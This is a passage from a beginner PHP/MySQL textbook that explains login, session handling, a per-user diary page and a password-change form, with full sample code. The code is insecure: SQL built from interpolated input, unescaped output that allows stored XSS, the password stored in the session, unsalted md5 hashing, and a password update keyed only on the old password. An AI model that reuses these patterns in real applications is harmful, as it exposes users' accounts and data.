  $_SESSION['id']=$id;  

  $_SESSION['user_name']=$user_name;  

  $_SESSION['password']=$password;  

  $_SESSION['name']=$name; 

  $_SESSION['email']=$email;      

   

//direct the users to his welcome page  

  header("Location:auth_welcome.php");    

  

}else{  

header("Location:auth_login.php?msg=Sorry: either the ID  

or Password, you provide is incorrect.");     

}  

     

?> 
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Actually this page as no HTML or interface, it’s just some junk of codes, as usual I bolded four (4) 
lines of code that need further explanation. 

 

First 

The first line I bolded is:  

 

$sql = "SELECT * FROM user WHERE user_name='$user_id' AND  

password = '$pswd'"; 

 

Recall that this query is similar to the one we use in Registration, except that we use AND instead of 
OR, the AND ensure that you will only be granted access if only both your User ID and Password is 
registered in the user table. 

 

Just below this is the second line of code I bolded  

 

Second 

if (mysql_num_rows($result) == 1) { 

 

 Also recall that I said that the algorithm for the Registration (that is register if record is not exist) is 
the opposite of the Login algorithm (that is login if record is existing), it’s what we user here, that is 
Login IF the number of row or record from the query is EQUAL (==) to 1. 

Since no two users can register with the same User ID and Password (we have already taken care of 
this in the Registration) that is why we said the query should check for just one (1) record. If this is 
TRUE that is the record is EQUAL to one (1) then, the codes that fetch or get the remaining record is 
executed…. 

 

//if user is registered, get his record  

$info = mysql_fetch_array($result);  

$id = $info['id'];  

  $user_name = $info['user_name']; 

  $password = $info['password']; 

  $name = $info['name']; 

  $email = $info['email']; 

 

Then follow by the third bolded lines of code. 

 

Third 

This block of code, creates SESSION variables, store the fetched data to it and direct the user to the 
welcome page if he has registered (that is the record found is equal to 1) ELSE he will be returned to 
the login page to try again.  
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//Create session and store the records to it 

  session_start(); 

     

  $_SESSION['id']=$id;  

  $_SESSION['user_name']=$user_name;  

  $_SESSION['password']=$password;  

  $_SESSION['name']=$name; 

  $_SESSION['email']=$email; 

 

The SESSION variable holds the variables data, this is the backbone in building authentication 
applications, because you need to keep track of a user activities in sessions throughout his or her 
stay in the Login environment. 

My point is that, ordinary variable life span is usually limited within a particular page while 
SESSION variable once created can be access or call from any page within the website or 
application, you get the scope now! 

 

To use a session (either to create session variable, access the variables or destroy the session) we 
must first start it; this is done using session_start(); 

Then the remaining lines are use to create SESSION variables to hold the data retrieved…. 

 

With the SESSION variables ready, we now direct the user to the welcome page using  

header("Location:auth_welcome.php");  

 

In the next exercise (after login) we will be using the SESSION in the Welcome page to: 

(1) Restrict unauthorized user access to this welcome area (that is the personal dairy). 

(2) We will also use the session variable to display the user’s activity, which is his or her dairy 
content only. 

  

auth_welcome.php 

To understand this example I registered three user accounts. 

 

And will login into two of these accounts to post to their diary. 
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Let’s assume I login into Dan’s account, if the login attempt is successful I will be ushered to his 
diary. See the screenshot below. 

 

Note: I login using dan as both my User ID and Password respectively,  

 

 

  And I type comment ‘stuff’ and submit…..  
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This post now display below the Header DANIEL ONE'S DAIRY CONTENT, as we have in Screenshot B 
(above) 

And the next post will keep accumulating below. 
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After this I decided to LOGOUT, Note that the logout take’s us to the Login page and Destroy the 
Session that is created or currently active. This is what the lines of code …  

<?php  

session_start(); 

session_destroy();  

?> 

 …at the top of the login page auth_login.php does  

 

This prevents unauthorized users access to the welcome page auth_welcome.php and from gaining 
access to your account after you’ve logout from your personal dairy. 

To test this, I click on the Back button of my Mozilla Firefox browser, after I’ve logout and here is 
what I got  
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 This is how a simple logout is  

 

 

Login with another account 

Now I login into Kunle’s account. Below is the screenshot. 

 

Note: I use the arrow to point your attention to Kunle’s empty or blank dairy, this is because kunle 
has not posted anything in his dairy, remember it was dan that posted two messages on his. This 
tracking of user events or activities is made possible using session variables.  

 

 

 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

471 

 

 

And as Kunle start posting, his dairy record will be kept different from dan’s this is how personal 
events such as your facebook messages, walls and other activities are kept distinctly from one 
person’s account to another. 

 

Now see the source code of our welcome page, below. 

auth_welcome.php 

This welcome area or dairy application is just a file auth_welcome.php that the user sees when they 
successfully logged in. It post back to its self when the dairy message is entered and submitted and 
also maintains the session of each user. Below is the code  

auth_welcome.php 

<?php  

session_start(); 

if (!$_SESSION['user_name']){  

header("Location:auth_login.php?msg=Sorry: please login again!"); 

} 

 

//include the connection string 

include("conn.php"); 

//save the dairy post 

if(isset($_POST['ready'])){ 

 // keep the form data in variable   

 $title=mysql_real_escape_string($_POST['title']); 

 $comment=mysql_real_escape_string($_POST['comment']); 
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 //store the query in a variable   

 $sql="INSERT INTO dairy  VALUES ('','$_SESSION[user_name]', 

'$title', '$comment',now())";   

  

 //execute the quesry 

 mysql_query($sql,$conn) or die(mysql_error()); 

  

 //store the thanks msg 

 $msg = "Record is stored"; 

} 

?> 

<html> 

<head> 

<title>Authentication</title> 

</head> 

<body> 

 

<p> 

WELCOME <b><?php print strtoupper($_SESSION['name']);?></b>  

<a href="auth_login.php">logout</a><br /> 

<?php 

// display the msg 

if(isset($msg)){ 

 echo $msg; 

} 

?> 

</p> 

<form method="post" action="auth_welcome.php"> 

<table> 

<tr> 

<td colspan="2"><b>KEEP EVENTS </b></td> 

</tr> 

<tr> 

<td><strong> Title </strong></td> 

<td><input name="title" type="text" id="title" size="30" /></td> 

</tr> 

<tr> 

<td></td> 
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<td> 

<textarea name="comment" cols="30" rows="5" id="comment"></textarea> 

</td> 

</tr> 

<tr>               

<td><input name="ready" type="hidden" id="ready" value="yes"></td> 

<td><input type="submit" name="Submit" value="Submit" /></td> 

</tr> 

</table> 

</form> 

     

<table width="40%" border="1"> 

<tr> 

<td> 

<b><?php print strtoupper($_SESSION['name']);?>'S DAIRY CONTENT</b>  

<br /><br /> 

 

<?php 

//display the dairy content 

$query  = "SELECT * FROM dairy WHERE 

user_id='$_SESSION[user_name]'"; 

$result = mysql_query($query, $conn) or die(mysql_error()); 

 

//loop through the query result and print  

while($info = mysql_fetch_array($result)){ 

 

  $id = $info['id'];  

 $user_id = $info['user_id']; 

 $title = $info['title']; 

 $content = $info['content']; 

 $date_submit = $info['date_submit']; 

 

  print "   

  <b>TITLE: $title</b>  

  <br /> 

  $content  

  <br /> 

  $date_submit     

  <hr>  

  "; 
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} 

?></td> 

  </tr> 

</table> 

</body> 

</html> 

 

 

In the code above, I bolded five lines that needs some explanation, the first is  

 

First  

session_start(); 

if (!$_SESSION['user_name']){  

header("Location:auth_login.php?msg=Sorry: please login again!"); 

} 

 

This lines of code ensure that nobody or unauthorized use bye-pass into the this account area (that 
is auth_welcome.php), for example if you have not login and you type this URL on your browser 
http://localhost/bws/auth_welcome.php 

  

You will be denied access redirected or returned to the login page to Login. See the screenshot 
below. 
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How this code works 

Because session’s variable is used, we have to start session first 

session_start(); 

 

This is followed by an IF statement which check if the session variable 

$_SESSION['user_name'] is NOT (!) contain any data  

 

Remember this session variable must have been created and assign a data in auth_test.php if the 
users had login.  

 

if (!$_SESSION['user_name']){  

 

If this condition is TRUE, that means the session variable is not available and the user had not login 
or the session has expired, therefore he will be denied access and the next line….  

header("Location:auth_login.php?msg=Sorry: please login again!"); 

…would return the user to the login page, with the message “Sorry: please login again” 

 

Session expires 20 minute by default if the application is left idle 
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Just like the update example we did earlier, the second bolded line of code follows… 

 

Second 

//save the dairy post 

if(isset($_POST['ready'])){ 

 

This block of if statement makes this section not to execute until the user click or submit the form 
and the hidden field “ready” contains the “yes” value (that makes the block of code to execute) 

<input name="ready" type="hidden" id="ready" value="yes"> 

 

Assuming this section is executed, that is the form is submitted; then this if statement block is 
executed and it simply INSERT the post into the dairy table.  

 

I decided to discuss the lines of code below, because of the session variable 
$_SESSION[user_name] that insert the user id  into the dairy table along with the other dairy 
content. 

 

 //store the query in a variable   

$sql="INSERT INTO dairy  VALUES ('','$_SESSION[user_name]', 

'$title', '$comment',now())"; 

 

This is important because with the user_id $_SESSION[user_name] inserted into this dairy 
table will help us to filter our SELECTion to show only the dairy record of logged in user.  

Below is the SELECT code with the restricted WHERE display. 

 

<?php 

//display the dairy content 

$query  = "SELECT * FROM dairy WHERE 

user_id='$_SESSION[user_name]'"; 

….. 

 

This is how kunle, for example is able to see his diary record ONLY when he login and not any other 
persons dairy record. 
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This explains the code in the welcome page auth_welcome.php, so let’s see the Change Password 
section that follows. 

  

auth_change_pw.php 

From the login page, the Change Password link leads us to the Change Password page for us to 
change our password, in case we thinks someone has gotten a glimpse to it. 

 

<?php  

include("conn.php");  

 

if ($_POST['ready'] == "go"){ 

 if ($_POST['password2'] != $_POST['password3']){ 

  $msg="<font color=\"red\">NewPassword is not thesame  

with re-entered password.</font>"; 

 }else{ 
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  $pw = mysql_escape_string($_POST['password']); 

  $pw2 = mysql_escape_string($_POST['password2']); 

  //to encryption both password 

  $pw = md5($pw); 

  $pw2 = md5($pw2); 

    

   $query  = "SELECT * FROM user WHERE password = 

'$pw'"; 

   $result= mysql_query($query, $conn) or 

die(mysql_error()); 

 

 if (mysql_num_rows($result) == 1) {  

 $sql = "UPDATE user SET password='$pw2' WHERE password= 

'$pw'"; 

    $result = mysql_query($sql,$conn) or  

die("Invalid character enter..."); 

    $msg="<font color=\"blue\">Password  

Successfully changed.</font>"; 

 -}else{   

    $msg="<font color=\"red\">Sorry Old  

Password not found.</font> "; 

   } 

 } 

} 

?> 

<html> 

<head> 

<title>Authentication</title> 

</head> 

<body> 

 

 

CHANGE PASSWORD 

<?php 

if (isset($msg)){ 

 print $msg; 

} 

?> 
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<br /> 

<a href="auth_login.php">Login</a><br /> 

<form method="post" action="auth_change_pw.php"> 

<table width="50%" border="0" > 

<tr><td colspan="2"></td> 

</tr> 

<tr> 

<td>USER ID</td> 

<td><input name="user_name" type="text" id="user_name" /></td> 

</tr> 

<tr> 

<td>OLD PASSWORD</td> 

<td><input name="password" type="password" id="password" /></td> 

</tr> 

 

<tr> 

<td>New Password</td> 

<td><input name="password2" type="password" id="password2" /></td> 

</tr> 

 

<tr> 

<td>Re-enter New Password</td> 

<td><input name="password3" type="password" id="password3" /></td> 

</tr> 

 

<tr> 

<td><input type="hidden" name="ready" value="go" /></td> 

<td><input type="submit" value="CHANGE"  /></td> 

</tr> 

</table> 

</form> 

</body> 

</html> 

 

In conclusion, it’s been a beautiful experience putting this book together and even more challenging 
having the courage to publish it, however we will be glad if you can continue this journey in our 
website www.NEMSacademy.com most of the materials in this book can also be found there along 
with more PHP and MySQL sample codes, and even Java and ASP.NET which we update from time to 
time. Thank you. 


